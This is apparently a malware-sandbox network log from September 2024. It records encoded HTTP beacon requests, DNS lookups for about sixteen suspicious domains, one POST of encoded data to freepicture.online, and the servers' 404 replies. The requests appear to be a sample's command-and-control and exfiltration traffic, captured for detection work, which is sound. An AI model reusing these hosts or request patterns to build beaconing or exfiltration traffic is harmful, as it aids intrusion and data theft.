            Source: global trafficHTTP traffic detected: GET /ed2j/?bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mizuquan.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy+WEToB6xBGpoD2p7QTvgcO3M3YppYLGUXZXpGn5emzv8m+RO5fgId9MtFylBATvIp79Sr7dA==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.capbear.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kdsf/?bX=mrPbX6f2ANh6eH6BaYBcOaExirfKelxT8B/s11FteNVWpCBC/Ng1kYBANMlCHLb8Vm1KElmPNEHDJkuYfrXhfpk22msKwfJUhUP/5Z9IMLZY9GQtDtvdXiZeiMyh2YwcFA==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.groet.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ivyl/?bX=R3Qz1Cq/YEXK51DnfrEfG6FZDYGRURJsK8S8Pa4nsScgDMDttNnynOTz2BK+/4aKVNhzLsJ6XObNN2Y75FAxAaoazEpO0rybbGrvB+WgGgze1Cytk6YUwSk/iMHlseUc1g==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.070001350.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.726075.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.726075.buzz
            Source: global trafficDNS traffic detected: DNS query: www.freepicture.online
            Source: global trafficDNS traffic detected: DNS query: www.318st.com
            Source: global trafficDNS traffic detected: DNS query: www.hm62t.top
            Source: global trafficDNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mfgamecompany.shop
            Source: global trafficDNS traffic detected: DNS query: www.quilo.life
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.kckartal.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.capbear.net
            Source: global trafficDNS traffic detected: DNS query: www.groet.online
            Source: global trafficDNS traffic detected: DNS query: www.070001350.xyz
            Source: unknownHTTP traffic detected: POST /xcfw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.freepicture.onlineOrigin: http://www.freepicture.onlineReferer: http://www.freepicture.online/xcfw/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d Data Ascii: bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:29:43 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:29:59 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:30:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:30:04 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:30:07 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:21 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:24 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:26 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 16 Sep 2024 07:30:43 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-16T07:30:48.3042146Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:02 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:05 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:07 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:10 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
